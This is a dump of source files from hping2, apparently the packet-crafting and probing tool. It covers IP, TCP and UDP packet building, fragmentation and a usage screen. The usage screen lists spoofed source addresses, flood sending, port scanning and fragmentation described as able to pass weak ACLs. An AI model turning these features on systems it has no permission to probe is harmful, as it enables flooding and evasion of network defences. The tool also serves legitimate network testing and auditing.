memcpy(&ip->daddr, dst, sizeof(ip->daddr)); 45 | 46 | /* build ip header */ 47 | ip->version = 4; 48 | ip->ihl = (IPHDR_SIZE + optlen + 3) >> 2; 49 | ip->tos = ip_tos; 50 | 51 | #if defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD || defined OSTYPE_BSDI 52 | /* FreeBSD */ 53 | /* NetBSD */ 54 | ip->tot_len = packetsize; 55 | #else 56 | /* Linux */ 57 | /* OpenBSD */ 58 | ip->tot_len = htons(packetsize); 59 | #endif 60 | 61 | if (!opt_fragment) 62 | { 63 | ip->id = (src_id == -1) ? 64 | htons((unsigned short) rand()) : 65 | htons((unsigned short) src_id); 66 | } 67 | else /* if you need fragmentation id must not be randomic */ 68 | { 69 | /* FIXME: when frag. enabled sendip_handler shold inc. ip->id */ 70 | /* for every frame sent */ 71 | ip->id = (src_id == -1) ? 72 | htons(getpid() & 255) : 73 | htons((unsigned short) src_id); 74 | } 75 | 76 | #if defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD | defined OSTYPE_BSDI 77 | /* FreeBSD */ 78 | /* NetBSD */ 79 | ip->frag_off |= more_fragments; 80 | ip->frag_off |= fragoff >> 3; 81 | #else 82 | /* Linux */ 83 | /* OpenBSD */ 84 | ip->frag_off |= htons(more_fragments); 85 | ip->frag_off |= htons(fragoff >> 3); /* shift three flags bit */ 86 | #endif 87 | 88 | ip->ttl = src_ttl; 89 | if (opt_rawipmode) ip->protocol = raw_ip_protocol; 90 | else if (opt_icmpmode) ip->protocol = 1; /* icmp */ 91 | else if (opt_udpmode) ip->protocol = 17; /* udp */ 92 | else ip->protocol = 6; /* tcp */ 93 | ip->check = 0; /* always computed by the kernel */ 94 | 95 | /* copies options */ 96 | if (options != NULL) 97 | memcpy(packet+IPHDR_SIZE, options, optlen); 98 | 99 | /* copies data */ 100 | memcpy(packet + IPHDR_SIZE + optlen, data, datalen); 101 | 102 | if (opt_debug == TRUE) 103 | { 104 | unsigned int i; 105 | 106 | for (i=0; i$ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 3$ 9 | */ 10 | 11 | /* $Id: sendip_handler.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | 15 | #include "hping2.h" 16 | #include "globals.h" 17 | 18 | void send_ip_handler(char *packet, unsigned int size) 19 | { 20 | ip_optlen = ip_opt_build(ip_opt); 21 | 22 | if (!opt_fragment && (size+ip_optlen+20 >= h_if_mtu)) 23 | { 24 | /* auto-activate fragmentation */ 25 | virtual_mtu = h_if_mtu-20; 26 | virtual_mtu = virtual_mtu - (virtual_mtu % 8); 27 | opt_fragment = TRUE; 28 | opt_mf = opt_df = FALSE; /* deactivate incompatible options */ 29 | if (opt_verbose || opt_debug) 30 | printf("auto-activate fragmentation, fragments size: %d\n", virtual_mtu); 31 | } 32 | 33 | if (!opt_fragment) 34 | { 35 | unsigned short fragment_flag = 0; 36 | 37 | if (opt_mf) fragment_flag |= MF; /* more fragments */ 38 | if (opt_df) fragment_flag |= DF; /* dont fragment */ 39 | send_ip((char*)&local.sin_addr, 40 | (char*)&remote.sin_addr, 41 | packet, size, fragment_flag, ip_frag_offset, 42 | ip_opt, ip_optlen); 43 | } 44 | else 45 | { 46 | unsigned int remainder = size; 47 | int frag_offset = 0; 48 | 49 | while(1) { 50 | if (remainder <= virtual_mtu) 51 | break; 52 | 53 | send_ip((char*)&local.sin_addr, 54 | (char*)&remote.sin_addr, 55 | packet+frag_offset, 56 | virtual_mtu, MF, frag_offset, 57 | ip_opt, ip_optlen); 58 | 59 | remainder-=virtual_mtu; 60 | frag_offset+=virtual_mtu; 61 | } 62 | 63 | send_ip((char*)&local.sin_addr, 64 | (char*)&remote.sin_addr, 65 | packet+frag_offset, 66 | remainder, NF, frag_offset, 67 | ip_opt, ip_optlen); 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /sendrawip.c: -------------------------------------------------------------------------------- 1 | /* $Id: sendrawip.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #include "hping2.h" 12 | #include "globals.h" 13 | 14 | void send_rawip(void) 15 | { 16 | char *packet; 17 | 18 | packet = malloc(data_size); 19 | if (packet == NULL) { 20 | perror("[send_rawip] malloc()"); 21 | return; 22 | } 23 | memset(packet, 0, data_size); 24 | data_handler(packet, data_size); 25 | send_ip_handler(packet, data_size); 26 | free(packet); 27 | } 28 | -------------------------------------------------------------------------------- /sendtcp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendtcp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sendtcp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | void send_tcp(void) 25 | { 26 | int packet_size; 27 | int tcp_opt_size = 0; 28 | char *packet, *data; 29 | struct mytcphdr *tcp; 30 | struct pseudohdr *pseudoheader; 31 | unsigned char *tstamp; 32 | 33 | if (opt_tcp_timestamp) 34 | tcp_opt_size = 12; 35 | 36 | packet_size = TCPHDR_SIZE + tcp_opt_size + data_size; 37 | packet = malloc(PSEUDOHDR_SIZE + packet_size); 38 | if (packet == NULL) { 39 | perror("[send_tcphdr] malloc()"); 40 | return; 41 | } 42 | pseudoheader = (struct pseudohdr*) packet; 43 | tcp = (struct mytcphdr*) (packet+PSEUDOHDR_SIZE); 44 | tstamp = (unsigned char*) (packet+PSEUDOHDR_SIZE+TCPHDR_SIZE); 45 | data = (char*) (packet+PSEUDOHDR_SIZE+TCPHDR_SIZE+tcp_opt_size); 46 | 47 | memset(packet, 0, PSEUDOHDR_SIZE+packet_size); 48 | 49 | /* tcp pseudo header */ 50 | memcpy(&pseudoheader->saddr, &local.sin_addr.s_addr, 4); 51 | memcpy(&pseudoheader->daddr, &remote.sin_addr.s_addr, 4); 52 | pseudoheader->protocol = 6; /* tcp */ 53 | pseudoheader->lenght = htons(TCPHDR_SIZE+tcp_opt_size+data_size); 54 | 55 | /* tcp header */ 56 | tcp->th_dport = htons(dst_port); 57 | tcp->th_sport = htons(src_port); 58 | 59 | /* sequence number and ack are random if not set */ 60 | tcp->th_seq = (set_seqnum) ? htonl(tcp_seqnum) : htonl(rand()); 61 | tcp->th_ack = (set_ack) ? htonl(tcp_ack) : htonl(rand()); 62 | 63 | tcp->th_off = src_thoff + (tcp_opt_size >> 2); 64 | tcp->th_win = htons(src_winsize); 65 | tcp->th_flags = tcp_th_flags; 66 | 67 | /* tcp timestamp option */ 68 | if (opt_tcp_timestamp) { 69 | __u32 randts = rand() ^ (rand() << 16); 70 | tstamp[0] = tstamp[1] = 1; /* NOOP */ 71 | tstamp[2] = 8; 72 | tstamp[3] = 10; /* 10 bytes, kind+len+T1+T2 */ 73 | memcpy(tstamp+4, &randts, 4); /* random */ 74 | memset(tstamp+8, 0, 4); /* zero */ 75 | } 76 | 77 | /* data */ 78 | data_handler(data, data_size); 79 | 80 | /* compute checksum */ 81 | #ifdef STUPID_SOLARIS_CHECKSUM_BUG 82 | tcp->th_sum = packet_size; 83 | #else 84 | tcp->th_sum = cksum((u_short*) packet, PSEUDOHDR_SIZE + 85 | packet_size); 86 | #endif 87 | 88 | /* adds this pkt in delaytable */ 89 | delaytable_add(sequence, src_port, time(NULL), get_usec(), S_SENT); 90 | 91 | /* send packet */ 92 | send_ip_handler(packet+PSEUDOHDR_SIZE, packet_size); 93 | free(packet); 94 | 95 | sequence++; /* next sequence number */ 96 | if (!opt_keepstill) 97 | src_port = (sequence + initsport) % 65536; 98 | 99 | if (opt_force_incdport) 100 | dst_port++; 101 | } 102 | -------------------------------------------------------------------------------- /sendudp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendudp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sendudp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | /* void hexdumper(unsigned char *packet, int size); */ 25 | 26 | void send_udp(void) 27 | { 28 | int packet_size; 29 | char *packet, *data; 30 | struct myudphdr *udp; 31 | struct pseudohdr *pseudoheader; 32 | 33 | packet_size = UDPHDR_SIZE + data_size; 34 | packet = malloc(PSEUDOHDR_SIZE + packet_size); 35 | if (packet == NULL) { 36 | perror("[send_udphdr] malloc()"); 37 | return; 38 | } 39 | pseudoheader = (struct pseudohdr*) packet; 40 | udp = (struct myudphdr*) (packet+PSEUDOHDR_SIZE); 41 | data = (char*) (packet+PSEUDOHDR_SIZE+UDPHDR_SIZE); 42 | 43 | memset(packet, 0, PSEUDOHDR_SIZE+packet_size); 44 | 45 | /* udp pseudo header */ 46 | memcpy(&pseudoheader->saddr, &local.sin_addr.s_addr, 4); 47 | memcpy(&pseudoheader->daddr, &remote.sin_addr.s_addr, 4); 48 | pseudoheader->protocol = 17; /* udp */ 49 | pseudoheader->lenght = htons(packet_size); 50 | 51 | /* udp header */ 52 | udp->uh_dport = htons(dst_port); 53 | udp->uh_sport = htons(src_port); 54 | udp->uh_ulen = htons(packet_size); 55 | 56 | /* data */ 57 | data_handler(data, data_size); 58 | 59 | /* compute checksum */ 60 | #ifdef STUPID_SOLARIS_CHECKSUM_BUG 61 | udp->uh_sum = packet_size; 62 | #else 63 | udp->uh_sum = cksum((__u16*) packet, PSEUDOHDR_SIZE + 64 | packet_size); 65 | #endif 66 | 67 | /* adds this pkt in delaytable */ 68 | delaytable_add(sequence, src_port, time(NULL), get_usec(), S_SENT); 69 | 70 | /* send packet */ 71 | send_ip_handler(packet+PSEUDOHDR_SIZE, packet_size); 72 | free(packet); 73 | 74 | sequence++; /* next sequence number */ 75 | 76 | if (!opt_keepstill) 77 | src_port = (sequence + initsport) % 65536; 78 | 79 | if (opt_force_incdport) 80 | dst_port++; 81 | } 82 | -------------------------------------------------------------------------------- /signal.c: -------------------------------------------------------------------------------- 1 | /* protable signal() like */ 2 | 3 | /* $Id: signal.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 4 | 5 | #include 6 | 7 | /* Portable signal() from R.Stevens, 8 | * modified to reset the handler */ 9 | void (*Signal(int signo, void (*func)(int)))(int) 10 | { 11 | struct sigaction act, oact; 12 | 13 | act.sa_handler = func; 14 | sigemptyset(&act.sa_mask); 15 | act.sa_flags = 0; /* So if set SA_RESETHAND is cleared */ 16 | if (signo == SIGALRM) 17 | { 18 | #ifdef SA_INTERRUPT 19 | act.sa_flags |= SA_INTERRUPT; /* SunOS 4.x */ 20 | #endif 21 | } 22 | else 23 | { 24 | #ifdef SA_RESTART 25 | act.sa_flags |= SA_RESTART; /* SVR4, 4.4BSD, Linux */ 26 | #endif 27 | } 28 | if (sigaction(signo, &act, &oact) == -1) 29 | return SIG_ERR; 30 | return (oact.sa_handler); 31 | } 32 | -------------------------------------------------------------------------------- /sockopt.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sockopt.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sockopt.c,v 1.3 2003/09/07 11:21:18 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include /* IP_PROTOIP */ 16 | #include 17 | 18 | void socket_broadcast(int sd) 19 | { 20 | const int one = 1; 21 | 22 | if (setsockopt(sd, SOL_SOCKET, SO_BROADCAST, 23 | (char *)&one, sizeof(one)) == -1) 24 | { 25 | printf("[socket_broadcast] can't set SO_BROADCAST option\n"); 26 | /* non fatal error */ 27 | } 28 | } 29 | 30 | void socket_iphdrincl(int sd) 31 | { 32 | const int one = 1; 33 | 34 | if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, 35 | (char *)&one, sizeof(one)) == -1) 36 | { 37 | printf("[socket_iphdrincl] can't set IP_HDRINCL option\n"); 38 | /* non fatal error */ 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /statistics.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: statistics.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:50 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: statistics.c,v 1.3 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | void print_statistics(int signal_id) 20 | { 21 | unsigned int lossrate; 22 | 23 | close_pcap(); 24 | if (recv_pkt > 0) 25 | lossrate = 100 - ((recv_pkt*100)/sent_pkt); 26 | else 27 | if (!sent_pkt) 28 | lossrate = 0; 29 | else 30 | lossrate = 100; 31 | 32 | fprintf(stderr, "\n--- %s hping statistic ---\n", targetname); 33 | fprintf(stderr, "%d packets tramitted, %d packets received, " 34 | "%d%% packet loss\n", sent_pkt, recv_pkt, lossrate); 35 | if (out_of_sequence_pkt) 36 | fprintf(stderr, "%d out of sequence packets received\n", 37 | out_of_sequence_pkt); 38 | fprintf(stderr, "round-trip min/avg/max = %.1f/%.1f/%.1f ms\n", 39 | rtt_min, rtt_avg, rtt_max); 40 | 41 | /* manage exit code */ 42 | if (opt_tcpexitcode) 43 | { 44 | exit(tcp_exitcode); 45 | } 46 | else 47 | { 48 | if (recv_pkt) 49 | exit(0); 50 | else 51 | exit(1); 52 | } 53 | }; 54 | -------------------------------------------------------------------------------- /strlcpy.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: strLcpy.c$ 4 | * $author: Nicolas Jombart $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * *copyright: (c) 1998 Todd C. Miller $ 7 | * $license: This software is under GPL version 2 of license$ 8 | * $date: Wed Feb 13 17:02:32 CET 2002$ 9 | * $rev:$ 10 | */ 11 | 12 | /* $OpenBSD: strlcpy.c,v 1.4 1999/05/01 18:56:41 millert Exp $ */ 13 | 14 | /* 15 | * Copyright (c) 1998 Todd C. Miller 16 | * All rights reserved. 17 | * 18 | * Redistribution and use in source and binary forms, with or without 19 | * modification, are permitted provided that the following conditions 20 | * are met: 21 | * 1. Redistributions of source code must retain the above copyright 22 | * notice, this list of conditions and the following disclaimer. 23 | * 2. Redistributions in binary form must reproduce the above copyright 24 | * notice, this list of conditions and the following disclaimer in the 25 | * documentation and/or other materials provided with the distribution. 26 | * 3. The name of the author may not be used to endorse or promote products 27 | * derived from this software without specific prior written permission. 28 | * 29 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 30 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 31 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 32 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 33 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 34 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 35 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 36 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 37 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 38 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | */ 40 | 41 | /* $Id: strlcpy.c,v 1.1.1.1 2003/08/31 17:23:55 antirez Exp $ */ 42 | 43 | /* This function comes from BSD */ 44 | #if !defined(__FreeBSD__) && !defined(__OpenBSD__) && !defined(__NetBSD__) && \ 45 | !defined(__bsdi__) && !defined(__APPLE__) 46 | #include 47 | #include 48 | 49 | /* 50 | * Copy src to string dst of size siz. At most siz-1 characters 51 | * will be copied. Always NUL terminates (unless siz == 0). 52 | * Returns strlen(src); if retval >= siz, truncation occurred. 53 | */ 54 | size_t strlcpy(dst, src, siz) 55 | char *dst; 56 | const char *src; 57 | size_t siz; 58 | { 59 | register char *d = dst; 60 | register const char *s = src; 61 | register size_t n = siz; 62 | 63 | /* Copy as many bytes as will fit */ 64 | if (n != 0 && --n != 0) { 65 | do { 66 | if ((*d++ = *s++) == 0) 67 | break; 68 | } while (--n != 0); 69 | } 70 | 71 | /* Not enough room in dst, add NUL and traverse rest of src */ 72 | if (n == 0) { 73 | if (siz != 0) 74 | *d = '\0'; /* NUL-terminate dst */ 75 | while (*s++) 76 | ; 77 | } 78 | 79 | return(s - src - 1); /* count does not include NUL */ 80 | } 81 | 82 | #endif /* ! __*BSD__ */ 83 | -------------------------------------------------------------------------------- /usage.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: usage.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:50 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: usage.c,v 1.2 2004/06/18 09:53:11 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | void show_usage(void) 17 | { 18 | printf( 19 | "usage: hping host [options]\n" 20 | " -h --help show this help\n" 21 | " -v --version show version\n" 22 | " -c --count packet count\n" 23 | " -i --interval wait (uX for X microseconds, for example -i u1000)\n" 24 | " --fast alias for -i u10000 (10 packets for second)\n" 25 | " --faster alias for -i u1000 (100 packets for second)\n" 26 | " --flood sent packets as fast as possible. Don't show replies.\n" 27 | " -n --numeric numeric output\n" 28 | " -q --quiet quiet\n" 29 | " -I --interface interface name (otherwise default routing interface)\n" 30 | " -V --verbose verbose mode\n" 31 | " -D --debug debugging info\n" 32 | " -z --bind bind ctrl+z to ttl (default to dst port)\n" 33 | " -Z --unbind unbind ctrl+z\n" 34 | " --beep beep for every matching packet received\n" 35 | "Mode\n" 36 | " default mode TCP\n" 37 | " -0 --rawip RAW IP mode\n" 38 | " -1 --icmp ICMP mode\n" 39 | " -2 --udp UDP mode\n" 40 | " -8 --scan SCAN mode.\n" 41 | " Example: hping --scan 1-30,70-90 -S www.target.host\n" 42 | " -9 --listen listen mode\n" 43 | "IP\n" 44 | " -a --spoof spoof source address\n" 45 | " --rand-dest random destionation address mode. see the man.\n" 46 | " --rand-source random source address mode. see the man.\n" 47 | " -t --ttl ttl (default 64)\n" 48 | " -N --id id (default random)\n" 49 | " -W --winid use win* id byte ordering\n" 50 | " -r --rel relativize id field (to estimate host traffic)\n" 51 | " -f --frag split packets in more frag. (may pass weak acl)\n" 52 | " -x --morefrag set more fragments flag\n" 53 | " -y --dontfrag set dont fragment flag\n" 54 | " -g --fragoff set the fragment offset\n" 55 | " -m --mtu set virtual mtu, implies --frag if packet size > mtu\n" 56 | " -o --tos type of service (default 0x00), try --tos help\n" 57 | " -G --rroute includes RECORD_ROUTE option and display the route buffer\n" 58 | " --lsrr loose source routing and record route\n" 59 | " --ssrr strict source routing and record route\n" 60 | " -H --ipproto set the IP protocol field, only in RAW IP mode\n" 61 | "ICMP\n" 62 | " -C --icmptype icmp type (default echo request)\n" 63 | " -K --icmpcode icmp code (default 0)\n" 64 | " --force-icmp send all icmp types (default send only supported types)\n" 65 | " --icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)\n" 66 | " --icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)\n" 67 | " --icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)\n" 68 | " --icmp-help display help for others icmp options\n" 69 | "UDP/TCP\n" 70 | " -s --baseport base source port (default random)\n" 71 | " -p --destport [+][+] destination port(default 0) ctrl+z inc/dec\n" 72 | " -k --keep keep still source port\n" 73 | " -w --win winsize (default 64)\n" 74 | " -O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)\n" 75 | " -Q --seqnum shows only tcp sequence number\n" 76 | " -b --badcksum (try to) send packets with a bad IP checksum\n" 77 | " many systems will fix the IP checksum sending the packet\n" 78 | " so you'll get bad UDP/TCP checksum instead.\n" 79 | " -M --setseq set TCP sequence number\n" 80 | " -L --setack set TCP ack\n" 81 | " -F --fin set FIN flag\n" 82 | " -S --syn set SYN flag\n" 83 | " -R --rst set RST flag\n" 84 | " -P --push set PUSH flag\n" 85 | " -A --ack set ACK flag\n" 86 | " -U --urg set URG flag\n" 87 | " -X --xmas set X unused flag (0x40)\n" 88 | " -Y --ymas set Y unused flag (0x80)\n" 89 | " --tcpexitcode use last tcp->th_flags as exit code\n" 90 | " --tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime\n" 91 | "Common\n" 92 | " -d --data data size (default is 0)\n" 93 | " -E --file data from file\n" 94 | " -e --sign add 'signature'\n" 95 | " -j --dump dump packets in hex\n" 96 | " -J --print dump printable characters\n" 97 | " -B --safe enable 'safe' protocol\n" 98 | " -u --end tell you when --file reached EOF and prevent rewind\n" 99 | " -T --traceroute traceroute mode (implies --bind and --ttl 1)\n" 100 | " --tr-stop Exit when receive the first not ICMP in traceroute mode\n" 101 | " --tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop\n" 102 | " --tr-no-rtt Don't calculate/show RTT information in traceroute mode\n" 103 | "ARS packet description (new, unstable)\n" 104 | " --apd-send Send the packet described with APD (see docs/APD.txt)\n" 105 | ); 106 | exit(0); 107 | }; 108 | 109 | void tos_help(void) 110 | { 111 | printf( 112 | "tos help:\n" 113 | " TOS Name Hex Value Typical Uses\n" 114 | "\n" 115 | " Minimum Delay 10 ftp, telnet\n" 116 | " Maximum Throughput 08 ftp-data\n" 117 | " Maximum Reliability 04 snmp\n" 118 | " Minimum Cost 02 nntp\n" 119 | ); 120 | exit(0); 121 | } 122 | 123 | void icmp_help(void) 124 | { 125 | printf( 126 | "ICMP help:\n" 127 | " ICMP concerned packet options:\n" 128 | " --icmp-ipver set ip version ( default 4 )\n" 129 | " --icmp-iphlen set ip header lenght ( default IPHDR_SIZE >> 2)\n" 130 | " --icmp-iplen set ip total lengtht ( default real lenght )\n" 131 | " --icmp-ipid set ip id ( default random )\n" 132 | " --icmp-ipproto set ip protocol ( default IPPROTO_TCP )\n" 133 | " --icmp-ipsrc set ip source ( default 0.0.0.0 )\n" 134 | " --icmp-ipdst set ip destination ( default 0.0.0.0 )\n" 135 | " --icmp-srcport set tcp/udp source port ( default random )\n" 136 | " --icmp-dstport set tcp/udp destination port ( default random )\n" 137 | " --icmp-cksum set icmp checksum ( default the right cksum)\n" 138 | ); 139 | exit(0); 140 | } 141 | 142 | void route_help(void) 143 | { 144 | printf( 145 | "route help:\n" 146 | " A route has the following format: [ptr:]IP1[/IP2[/IP3...]]\n" 147 | " where ptr is the exact value of the pointer that will be used for the IP\n" 148 | " option (be careful, no check is performed on this pointer), and defaults\n" 149 | " to 8, or 4 if provided route is too short for 8;\n" 150 | " and each IPx field is an IP address to include in the source route.\n"); 151 | } 152 | -------------------------------------------------------------------------------- /version.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: version.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:50 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: version.c,v 1.3 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | #include "release.h" 17 | #include "hping2.h" 18 | 19 | void show_version(void) 20 | { 21 | printf("hping version %s (%s)\n", RELEASE_VERSION, RELEASE_DATE); 22 | #ifdef USE_TCL 23 | printf("This binary is TCL scripting capable\n"); 24 | #else 25 | printf("NO TCL scripting support compiled in\n"); 26 | #endif 27 | exit(0); 28 | } 29 | 30 | --------------------------------------------------------------------------------